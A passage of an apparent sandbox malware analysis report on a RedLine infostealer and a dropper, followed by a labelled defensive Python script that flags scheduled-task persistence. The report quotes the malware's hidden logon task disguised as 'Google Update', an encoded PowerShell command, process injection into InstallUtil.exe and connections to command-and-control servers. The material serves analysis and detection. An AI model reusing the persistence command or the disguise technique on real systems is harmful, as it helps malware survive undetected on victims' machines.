PID 624 wrote to memory of 872 N/A C:\Users\Admin\AppData\Local\Temp\Mtuyzzclient6.exe C:\Windows\System32\cmd.exe
PID 624 wrote to memory of 1388 N/A C:\Users\Admin\AppData\Local\Temp\Mtuyzzclient6.exe C:\Windows\system32\cmd.exe
PID 624 wrote to memory of 1388 N/A C:\Users\Admin\AppData\Local\Temp\Mtuyzzclient6.exe C:\Windows\system32\cmd.exe
PID 872 wrote to memory of 2996 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 872 wrote to memory of 2996 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 1388 wrote to memory of 1920 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 1388 wrote to memory of 1920 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 4120 wrote to memory of 2924 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\SysWOW64\cmd.exe
PID 4120 wrote to memory of 2924 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\SysWOW64\cmd.exe
PID 4120 wrote to memory of 2924 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\SysWOW64\cmd.exe
PID 2924 wrote to memory of 4868 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 2924 wrote to memory of 4868 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 2924 wrote to memory of 4868 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 4120 wrote to memory of 2808 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\SysWOW64\cmd.exe
PID 4120 wrote to memory of 2808 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\SysWOW64\cmd.exe
PID 4120 wrote to memory of 2808 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\SysWOW64\cmd.exe
PID 2808 wrote to memory of 4928 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 2808 wrote to memory of 4928 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 2808 wrote to memory of 4928 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 1388 wrote to memory of 4524 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\Google Update.exe
PID 1388 wrote to memory of 4524 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\Google Update.exe
PID 1388 wrote to memory of 4524 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\Google Update.exe
PID 2808 wrote to memory of 4428 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Roaming\Google Update.exe
PID 2808 wrote to memory of 4428 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Roaming\Google Update.exe
PID 2808 wrote to memory of 4428 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Roaming\Google Update.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\Ehhbsuuemv.exe

"C:\Users\Admin\AppData\Local\Temp\Ehhbsuuemv.exe"

C:\Users\Admin\AppData\Local\Temp\Mtuyzzclient6.exe

"C:\Users\Admin\AppData\Local\Temp\Mtuyzzclient6.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Google Update" /tr '"C:\Users\Admin\AppData\Roaming\Google Update.exe"' & exit

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpECA2.tmp.bat""

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "Google Update" /tr '"C:\Users\Admin\AppData\Roaming\Google Update.exe"'

C:\Windows\system32\timeout.exe

timeout 3

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Google Update" /tr '"C:\Users\Admin\AppData\Roaming\Google Update.exe"' & exit

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "Google Update" /tr '"C:\Users\Admin\AppData\Roaming\Google Update.exe"'

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpF2AD.tmp.bat""

C:\Windows\SysWOW64\timeout.exe

timeout 3

C:\Users\Admin\AppData\Roaming\Google Update.exe

"C:\Users\Admin\AppData\Roaming\Google Update.exe"

C:\Users\Admin\AppData\Roaming\Google Update.exe

"C:\Users\Admin\AppData\Roaming\Google Update.exe"

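The Processes list above records the persistence step of this run twice: a scheduled task named "Google Update", triggered at every logon with /rl highest, whose action is a copy of the payload dropped to C:\Users\Admin\AppData\Roaming\Google Update.exe. One copy of the command comes from the Mtuyzzclient6.exe chain through System32\cmd.exe, the other from the InstallUtil.exe chain through SysWOW64\cmd.exe; in each chain a second cmd.exe runs a tmp*.tmp.bat file that waits (timeout 3) and then starts the dropped executable. The Python below is an added example, not part of this report or of the sandbox's own tooling: it parses schtasks command lines of this shape and scores the combination they show. The first two command lines are copied from the report, the third is a constructed benign control, and the USER_WRITABLE and VENDOR_WORDS lists are illustrative assumptions.

```python
"""Scheduled-task persistence triage over sandbox process command lines.

Added example: not part of this report or of the sandbox's own tooling.
"""
from __future__ import annotations

import re

# The first two command lines are copied from the Processes section of the report;
# the third is a constructed benign control that does not appear in the report.
SAMPLE_CMDLINES = [
    r"""schtasks /create /f /sc onlogon /rl highest /tn "Google Update" /tr '"C:\Users\Admin\AppData\Roaming\Google Update.exe"'""",
    r'''"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Google Update" /tr '"C:\Users\Admin\AppData\Roaming\Google Update.exe"' & exit''',
    r'''schtasks /create /sc daily /st 02:00 /tn "Backup" /tr "C:\Program Files\Acme\backup.exe"''',
]

# Illustrative assumptions, not exhaustive lists.
USER_WRITABLE = ("\\appdata\\", "\\users\\public\\", "\\programdata\\", "\\temp\\")
VENDOR_WORDS = ("google", "microsoft", "adobe", "windows", "update")

TRAILING_CMD_OPS = re.compile(r"\s(?:&&?|\|\|?)\s")   # "& exit", "&& ...", "| ..."
SWITCH_SPLIT = re.compile(r"(?:^|\s)/(\w+)")           # "/create", "/tn", "/tr", ...


def parse_schtasks(cmdline: str) -> dict[str, str] | None:
    """Return schtasks switches as {name: value}; None if the line is not a schtasks call."""
    m = re.search(r"\bschtasks(?:\.exe)?\b(.*)$", cmdline, re.IGNORECASE)
    if not m:
        return None
    # cmd.exe chained "& exit" after the call; keep only the schtasks part.
    args = TRAILING_CMD_OPS.split(m.group(1))[0]
    parts = SWITCH_SPLIT.split(args)          # ['', 'create', '', 'f', '', 'sc', ' onlogon', ...]
    opts: dict[str, str] = {}
    for name, value in zip(parts[1::2], parts[2::2]):
        # Values keep whatever quoting the dropper used, e.g. '"C:\...\Google Update.exe"'.
        opts[name.lower()] = value.strip().strip("'\"")
    return opts


def assess(opts: dict[str, str]) -> dict:
    """Score one schtasks invocation and list the reasons behind the score."""
    reasons: list[str] = []
    name, action = opts.get("tn", ""), opts.get("tr", "")
    trigger = opts.get("sc", "").lower()
    if "create" in opts:
        if trigger in ("onlogon", "onstart"):
            reasons.append(f"/sc {trigger}: re-runs at every logon or boot with no user action")
        if opts.get("rl", "").lower() == "highest":
            reasons.append("/rl highest: runs with the user's full token, no UAC prompt for an admin user")
        if "f" in opts:
            reasons.append("/f: silently replaces an existing task of the same name")
        if any(p in action.lower() for p in USER_WRITABLE):
            reasons.append("action binary lives in a user-writable directory")
        if any(w in name.lower() for w in VENDOR_WORDS) and "\\program files" not in action.lower():
            reasons.append("task name imitates a vendor updater but the action is not under Program Files")
    return {"task": name, "action": action, "reasons": reasons, "suspicious": len(reasons) >= 3}


def scan(cmdlines: list[str]) -> list[dict]:
    """Parse and assess every schtasks call in a list of process command lines."""
    results = []
    for line in cmdlines:
        opts = parse_schtasks(line)
        if opts is not None:
            results.append(assess(opts))
    return results


if __name__ == "__main__":
    for r in scan(SAMPLE_CMDLINES):
        print("SUSPICIOUS" if r["suspicious"] else "ok        ", repr(r["task"]), "->", r["action"])
        for reason in r["reasons"]:
            print("    -", reason)
```

Run as-is, the script reports SUSPICIOUS with five reasons for both command lines taken from the report and ok for the control. On a live host the artifact to compare against is the task's own definition (schtasks /query /tn "Google Update" /xml, standard schtasks usage rather than anything the report shows): the action path in that XML, not the task name, is what distinguishes this task from a real updater.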
Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 88.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 0.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 212.20.149.52.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 23.236.111.52.in-addr.arpa udp

Files

memory/2788-0-0x000000007484E000-0x000000007484F000-memory.dmp

memory/2788-1-0x00000000003F0000-0x0000000004854000-memory.dmp

memory/2788-2-0x00000000096C0000-0x0000000009C64000-memory.dmp

memory/2788-3-0x0000000009110000-0x00000000091A2000-memory.dmp

memory/2788-4-0x0000000074840000-0x0000000074FF0000-memory.dmp

memory/2788-5-0x00000000092A0000-0x00000000092AA000-memory.dmp

memory/2788-6-0x000000000A8E0000-0x000000000A9EA000-memory.dmp

memory/2788-7-0x000000000AAF0000-0x000000000AB18000-memory.dmp

memory/2788-8-0x000000000AC80000-0x000000000AD12000-memory.dmp

memory/2788-9-0x000000000AD40000-0x000000000AD62000-memory.dmp

memory/2788-10-0x000000000AD70000-0x000000000B0C4000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Mtuyzzclient6.exe

MD5 1f304261de14934db9384720c638744a
SHA1 b98f60e6feea77a31363d5a686e7be40f6cfc049
SHA256 ab23ec09d1ea7a359bd834f2fef7aa5272e8f643e9c27cb2bfe8869a6e447e87
SHA512 01f29cf8553d72070c56b953c23771fef9e4aba31b733b001f7b8a1e49e2cf02d120b21baf76ccfa9040548ed603c0308c95a4fedce7b4749fc01baf3c4fc826

memory/624-23-0x00000000006E0000-0x00000000006F8000-memory.dmp

memory/624-22-0x00007FFBFC663000-0x00007FFBFC665000-memory.dmp

memory/4120-25-0x0000000000400000-0x0000000000438000-memory.dmp

memory/2788-27-0x0000000074840000-0x0000000074FF0000-memory.dmp

C:\Users\Admin\AppData\Roaming\MyData\DataLogs.conf

MD5 cf759e4c5f14fe3eec41b87ed756cea8
SHA1 c27c796bb3c2fac929359563676f4ba1ffada1f5
SHA256 c9f9f193409217f73cc976ad078c6f8bf65d3aabcf5fad3e5a47536d47aa6761
SHA512 c7f832aee13a5eb36d145f35d4464374a9e12fa2017f3c2257442d67483b35a55eccae7f7729243350125b37033e075efbc2303839fd86b81b9b4dca3626953b

memory/624-29-0x00007FFBFC660000-0x00007FFBFD121000-memory.dmp

memory/4120-30-0x0000000005730000-0x0000000005740000-memory.dmp

memory/4120-31-0x000000007484E000-0x000000007484F000-memory.dmp

memory/624-36-0x00007FFBFC660000-0x00007FFBFD121000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\tmpECA2.tmp.bat

MD5 dfca17a60eff55e49d6e7e5e37900403
SHA1 a32dfb6f885dbd428643eb37ac560b46e47bd4b8
SHA256 2d952f987504f8b6d52fdfef3d370d2fefbcb60899372091818b98b98090abdc
SHA512 d596d5ffe689a76053061b656034aa5b9e56c9194c22459ced66209952d29b52b5e5292f324536977b8e94da8c163fa25fbe9b7ad40eb71e8880536b98777d6d

C:\Users\Admin\AppData\Local\Temp\tmpF2AD.tmp.bat

MD5 0ec9451077262e70a46e00a1a5e83014
SHA1 8e0c7fb4eeadb36c102b3a16dcab4479b6b5554d
SHA256 360fa6020b4182aa58a961492beeac41d51e80158aab0b66ba2c7d9529e3065a
SHA512 c5367719240f64eaf531ed887a677ba6eccda3866c910520c2a9c93f1a12578f8ff56a38622dca1b53a515b3a1c87039db809945ce865ede9edcfb9ff27a7cb1

C:\Users\Admin\AppData\Roaming\Google Update.exe

MD5 5d4073b2eb6d217c19f2b22f21bf8d57
SHA1 f0209900fbf08d004b886a0b3ba33ea2b0bf9da8
SHA256 ac1a3f21fcc88f9cee7bf51581eafba24cc76c924f0821deb2afdf1080ddf3d3
SHA512 9ac94880684933ba3407cdc135abc3047543436567af14cd9269c4adc5a6535db7b867d6de0d6238a21b94e69f9890dbb5739155871a624520623a7e56872159

memory/4524-48-0x00000000049F0000-0x0000000004A0A000-memory.dmp

memory/4524-47-0x0000000000260000-0x000000000026C000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Google Update.exe.log

MD5 f7a49804289daba7de5b3b77408276f7
SHA1 43dc40ddb1d6e081d52671a56ecefbcb4545e32c
SHA256 6b79cf98a0976e2e43f4e9fae56b57910360503435ff027b87e481d5c3b68892
SHA512 4e0dd3d97bb9cab135c649fac821c9664cad91f4e22fa883b426e20620affce41878981c7f20a3d859027a890304886c186e463ea0df17a184562ee6a1e48d64

Analysis: behavioral6

Detonation Overview

Submitted

2024-11-11 02:36

Reported

2024-11-11 02:42

Platform

win10v2004-20241007-en

Max time kernel

136s

Max time network

175s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Jtvcsfni.exe"

Signatures

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A

Redline family

redline

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Jtvcsfni.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 3856 set thread context of 4764 N/A C:\Users\Admin\AppData\Local\Temp\Jtvcsfni.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Jtvcsfni.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3856 wrote to memory of 1156 N/A C:\Users\Admin\AppData\Local\Temp\Jtvcsfni.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3856 wrote to memory of 1156 N/A C:\Users\Admin\AppData\Local\Temp\Jtvcsfni.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3856 wrote to memory of 1156 N/A C:\Users\Admin\AppData\Local\Temp\Jtvcsfni.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3856 wrote to memory of 4764 N/A C:\Users\Admin\AppData\Local\Temp\Jtvcsfni.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 3856 wrote to memory of 4764 N/A C:\Users\Admin\AppData\Local\Temp\Jtvcsfni.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 3856 wrote to memory of 4764 N/A C:\Users\Admin\AppData\Local\Temp\Jtvcsfni.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 3856 wrote to memory of 4764 N/A C:\Users\Admin\AppData\Local\Temp\Jtvcsfni.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 3856 wrote to memory of 4764 N/A C:\Users\Admin\AppData\Local\Temp\Jtvcsfni.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 3856 wrote to memory of 4764 N/A C:\Users\Admin\AppData\Local\Temp\Jtvcsfni.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 3856 wrote to memory of 4764 N/A C:\Users\Admin\AppData\Local\Temp\Jtvcsfni.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 3856 wrote to memory of 4764 N/A C:\Users\Admin\AppData\Local\Temp\Jtvcsfni.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Processes

C:\Users\Admin\AppData\Local\Temp\Jtvcsfni.exe

"C:\Users\Admin\AppData\Local\Temp\Jtvcsfni.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 133.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 212.20.149.52.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
RU 37.220.87.13:48790 tcp
RU 37.220.87.13:48790 tcp
RU 37.220.87.13:48790 tcp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
RU 37.220.87.13:48790 tcp
RU 37.220.87.13:48790 tcp
RU 37.220.87.13:48790 tcp

Files

memory/3856-0-0x000000007518E000-0x000000007518F000-memory.dmp

memory/3856-1-0x0000000000050000-0x0000000001050000-memory.dmp

memory/3856-2-0x0000000017BF0000-0x0000000018194000-memory.dmp

memory/3856-3-0x0000000017640000-0x00000000176D2000-memory.dmp

memory/3856-4-0x00000000175E0000-0x00000000175EA000-memory.dmp

memory/3856-5-0x0000000075180000-0x0000000075930000-memory.dmp

memory/3856-6-0x00000000179A0000-0x0000000017A48000-memory.dmp

memory/3856-7-0x0000000017880000-0x0000000017892000-memory.dmp

memory/3856-8-0x0000000017AA0000-0x0000000017AC2000-memory.dmp

memory/3856-9-0x00000000181A0000-0x00000000184F4000-memory.dmp

memory/1156-10-0x0000000003100000-0x0000000003136000-memory.dmp

memory/1156-11-0x0000000075180000-0x0000000075930000-memory.dmp

memory/1156-12-0x0000000005890000-0x0000000005EB8000-memory.dmp

memory/1156-13-0x0000000005F30000-0x0000000005F96000-memory.dmp

memory/1156-14-0x0000000006090000-0x00000000060F6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rzfxvuzy.f3h.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1156-24-0x00000000066E0000-0x00000000066FE000-memory.dmp

memory/1156-25-0x0000000006770000-0x00000000067BC000-memory.dmp

memory/1156-26-0x0000000007E10000-0x000000000848A000-memory.dmp

memory/1156-27-0x0000000006B50000-0x0000000006B6A000-memory.dmp

memory/3856-28-0x000000007518E000-0x000000007518F000-memory.dmp

memory/3856-29-0x0000000075180000-0x0000000075930000-memory.dmp

memory/1156-30-0x0000000075180000-0x0000000075930000-memory.dmp

memory/1156-34-0x0000000075180000-0x0000000075930000-memory.dmp

memory/4764-35-0x0000000000400000-0x0000000000446000-memory.dmp

memory/3856-38-0x0000000075180000-0x0000000075930000-memory.dmp

memory/4764-37-0x0000000075180000-0x0000000075930000-memory.dmp

memory/4764-40-0x0000000005110000-0x0000000005122000-memory.dmp

memory/4764-39-0x00000000056B0000-0x0000000005CC8000-memory.dmp

memory/4764-41-0x0000000005240000-0x000000000534A000-memory.dmp

memory/4764-42-0x0000000075180000-0x0000000075930000-memory.dmp

memory/4764-43-0x0000000005170000-0x00000000051AC000-memory.dmp

memory/4764-44-0x00000000051B0000-0x00000000051FC000-memory.dmp

memory/4764-45-0x0000000075180000-0x0000000075930000-memory.dmp

Analysis: behavioral14

Detonation Overview

Submitted

2024-11-11 02:36

Reported

2024-11-11 02:41

Platform

win10v2004-20241007-en

Max time kernel

133s

Max time network

142s

Command Line

"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\cgu3.docx" /o ""

Signatures

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A bitbucket.org N/A N/A
N/A bitbucket.org N/A N/A
N/A bitbucket.org N/A N/A
N/A bitbucket.org N/A N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeAuditPrivilege N/A C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A

Processes

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE

"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\cgu3.docx" /o ""

Network

Country Destination Domain Proto
US 8.8.8.8:53 roaming.officeapps.live.com udp
NL 52.109.89.19:443 roaming.officeapps.live.com tcp
US 8.8.8.8:53 46.28.109.52.in-addr.arpa udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 83.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 bitbucket.org udp
IE 185.166.142.22:443 bitbucket.org tcp
IE 185.166.142.22:443 bitbucket.org tcp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 19.89.109.52.in-addr.arpa udp
US 8.8.8.8:53 22.142.166.185.in-addr.arpa udp
US 8.8.8.8:53 75.159.190.20.in-addr.arpa udp
IE 185.166.142.22:443 bitbucket.org tcp
US 8.8.8.8:53 93.65.42.20.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 metadata.templates.cdn.office.net udp
GB 2.18.63.57:443 metadata.templates.cdn.office.net tcp
US 8.8.8.8:53 binaries.templates.cdn.office.net udp
GB 2.19.117.169:443 binaries.templates.cdn.office.net tcp
GB 2.19.117.169:443 binaries.templates.cdn.office.net tcp
GB 2.19.117.169:443 binaries.templates.cdn.office.net tcp
GB 2.19.117.169:443 binaries.templates.cdn.office.net tcp
GB 2.19.117.169:443 binaries.templates.cdn.office.net tcp
GB 2.19.117.169:443 binaries.templates.cdn.office.net tcp
GB 2.19.117.169:443 binaries.templates.cdn.office.net tcp
GB 2.19.117.169:443 binaries.templates.cdn.office.net tcp
GB 2.19.117.169:443 binaries.templates.cdn.office.net tcp
GB 2.19.117.169:443 binaries.templates.cdn.office.net tcp
GB 2.19.117.169:443 binaries.templates.cdn.office.net tcp
GB 2.19.117.169:443 binaries.templates.cdn.office.net tcp
GB 2.19.117.169:443 binaries.templates.cdn.office.net tcp
US 8.8.8.8:53 98.117.19.2.in-addr.arpa udp
US 8.8.8.8:53 57.63.18.2.in-addr.arpa udp
US 8.8.8.8:53 169.117.19.2.in-addr.arpa udp
US 8.8.8.8:53 31.243.111.52.in-addr.arpa udp

Files

memory/1872-5-0x00007FFA179D0000-0x00007FFA179E0000-memory.dmp

memory/1872-4-0x00007FFA179D0000-0x00007FFA179E0000-memory.dmp

memory/1872-9-0x00007FFA57950000-0x00007FFA57B45000-memory.dmp

memory/1872-8-0x00007FFA57950000-0x00007FFA57B45000-memory.dmp

memory/1872-7-0x00007FFA57950000-0x00007FFA57B45000-memory.dmp

memory/1872-6-0x00007FFA57950000-0x00007FFA57B45000-memory.dmp

memory/1872-10-0x00007FFA15970000-0x00007FFA15980000-memory.dmp

memory/1872-3-0x00007FFA179D0000-0x00007FFA179E0000-memory.dmp

memory/1872-14-0x00007FFA57950000-0x00007FFA57B45000-memory.dmp

memory/1872-16-0x00007FFA57950000-0x00007FFA57B45000-memory.dmp

memory/1872-20-0x00007FFA57950000-0x00007FFA57B45000-memory.dmp

memory/1872-21-0x00007FFA57950000-0x00007FFA57B45000-memory.dmp

memory/1872-19-0x00007FFA57950000-0x00007FFA57B45000-memory.dmp

memory/1872-18-0x00007FFA57950000-0x00007FFA57B45000-memory.dmp

memory/1872-17-0x00007FFA15970000-0x00007FFA15980000-memory.dmp

memory/1872-15-0x00007FFA57950000-0x00007FFA57B45000-memory.dmp

memory/1872-13-0x00007FFA57950000-0x00007FFA57B45000-memory.dmp

memory/1872-12-0x00007FFA57950000-0x00007FFA57B45000-memory.dmp

memory/1872-11-0x00007FFA57950000-0x00007FFA57B45000-memory.dmp

memory/1872-2-0x00007FFA179D0000-0x00007FFA179E0000-memory.dmp

memory/1872-0-0x00007FFA179D0000-0x00007FFA179E0000-memory.dmp

memory/1872-1-0x00007FFA579ED000-0x00007FFA579EE000-memory.dmp

memory/1872-44-0x00007FFA57950000-0x00007FFA57B45000-memory.dmp

memory/1872-43-0x00007FFA579ED000-0x00007FFA579EE000-memory.dmp

memory/1872-45-0x00007FFA57950000-0x00007FFA57B45000-memory.dmp

memory/1872-46-0x00007FFA57950000-0x00007FFA57B45000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms

MD5 47acc722be0bdea7a2933ee72e7a541e
SHA1 d6ef468d0e66cd9b77962584ece564a08b1651a0
SHA256 e6846bba6c3d438cbea2b267d95c1d43fc0f09ccf82c2b2d0fe536096179ef5f
SHA512 91d29bd7ec7731095c0cf691f749c9e1d8fd39b0c0d2d1c249966c94662be6cc6359d63df951c0b359165b30cd5ecc22eb4a3a9249094a0266267522da7dbb73

C:\Users\Admin\AppData\Local\Temp\TCD2173.tmp\iso690.xsl

MD5 ff0e07eff1333cdf9fc2523d323dd654
SHA1 77a1ae0dd8dbc3fee65dd6266f31e2a564d088a4
SHA256 3f925e0cc1542f09de1f99060899eafb0042bb9682507c907173c392115a44b5
SHA512 b4615f995fab87661c2dbe46625aa982215d7bde27cafae221dca76087fe76da4b4a381943436fcac1577cb3d260d0050b32b7b93e3eb07912494429f126bb3d

Analysis: behavioral28

Detonation Overview

Submitted

2024-11-11 02:36

Reported

2024-11-11 02:42

Platform

win10v2004-20241007-en

Max time kernel

134s

Max time network

155s

Command Line

"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\ferrr.dotm" /o ""

Signatures

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
